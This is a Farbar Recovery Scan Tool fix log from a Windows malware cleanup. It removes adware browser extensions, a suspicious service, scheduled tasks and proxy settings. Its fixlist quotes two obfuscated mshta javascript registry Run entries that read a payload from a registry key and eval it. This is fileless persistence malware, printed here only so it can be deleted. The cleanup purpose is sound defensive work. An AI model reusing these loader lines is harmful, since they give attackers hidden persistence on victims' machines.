Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by Joe (2016-03-29 00:02:45) Run:2
Running from C:\Users\Joe\Downloads
Loaded Profiles: Joe (Available Profiles: Joe)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
HKLM-x32\...\Run: [**eeb9c5dc<*>] => mshta javascript:VyIZ9J1V="VOf";Z2V8=new%20ActiveXObject("WScript.Shell");uJ45fzMWmA="Fe";GAj7Y=Z2V8.RegRead("HKLM\\software\\Wow6432Node\\e09000bd53\\76676c3b");nk0ceuWpp="XRl";eval(GAj7Y);tgL5ndl="H (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**552f49b9<*>] => mshta javascript:mdDO90BSHt="Av";tr69=new%20ActiveXObject("WScript.Shell");Khb1nGB="LpdnVipZK3";AR2lR=tr69.RegRead("HKLM\\software\\Wow6432Node\\e09000bd53\\76676c3b");nubGY1N6K="1JadTvk";eval(AR2lR); (the data entry has 20 more characters). <===== ATTENTION (Value Name with invalid characters)
Toolbar: HKU\S-1-5-21-3655023002-2648474569-3043735959-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
CHR Extension: (GGoSauve) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlabfejiidahciobclpfigdfpgfbedee [2014-09-25]
CHR HKLM\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx
CHR HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx
CHR HKLM-x32\...\Chrome\Extension: [debmkdhphjfcbaomiknnceliiclnpmfg] - C:\Program Files (x86)\Jump Flip\debmkdhphjfcbaomiknnceliiclnpmfg.crx
CHR HKLM-x32\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx
R2 syshost32; C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}\syshost.exe [215477 2015-12-22] () [File not signed]
2016-03-28 16:53 - 2014-09-25 20:28 - 00000000 ____D C:\ProgramData\4675a9632c473f58
Task: {46CF61D3-A536-490F-A3A3-5C1787480CBC} - System32\Tasks\UpdaterEX => C:\Users\Joe\AppData\Roaming\UpdaterEX\UpdateProc\UpdateTask.exe [2013-04-12] () <==== ATTENTION
C:\Users\Joe\AppData\Roaming\UpdaterEX
Task: C:\Windows\Tasks\UpdaterEX.job => C:\Users\Joe\AppData\Roaming\UPDATE~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg delete HKLM\software\Wow6432Node\e09000bd53
cmd: sfc /scanfile=C:\Windows\system32\Drivers\volsnap.sys
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers
*****************

Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**eeb9c5dc<*> => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\**552f49b9<*> => value not found.
HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value not found.
HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => key not found.
C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlabfejiidahciobclpfigdfpgfbedee => not found
HKLM\SOFTWARE\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff => key not found.
HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff => key not found.
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\debmkdhphjfcbaomiknnceliiclnpmfg => key not found.
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff => key not found.
syshost32 => service not found.
"C:\ProgramData\4675a9632c473f58" => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{46CF61D3-A536-490F-A3A3-5C1787480CBC} => key not found.
C:\Windows\System32\Tasks\UpdaterEX => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UpdaterEX => key not found.
"C:\Users\Joe\AppData\Roaming\UpdaterEX" => not found.
C:\Windows\Tasks\UpdaterEX.job => not found.
"C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}" => not found.

========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.

========= End of Reg: =========

========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.

========= End of Reg: =========

========= reg delete HKLM\software\Wow6432Node\e09000bd53 =========

Permanently delete the registry key HKEY_LOCAL_MACHINE\software\Wow6432Node\e09000bd53 (Yes/No)? ERROR: The system was unable to find the specified registry key or value.

========= End of Reg: =========

========= sfc /scanfile=C:\Windows\system32\Drivers\volsnap.sys =========

Windows Resource Protection did not find any integrity violations.

========= End of CMD: =========

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully

========= End of RemoveProxy: =========

========= bitsadmin /reset /allusers =========

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to connect to BITS - 0x80070424

========= End of CMD: =========

EmptyTemp: => 48.5 GB temporary data Removed.

The system needed a reboot.

==== End of Fixlog 00:08:45 ====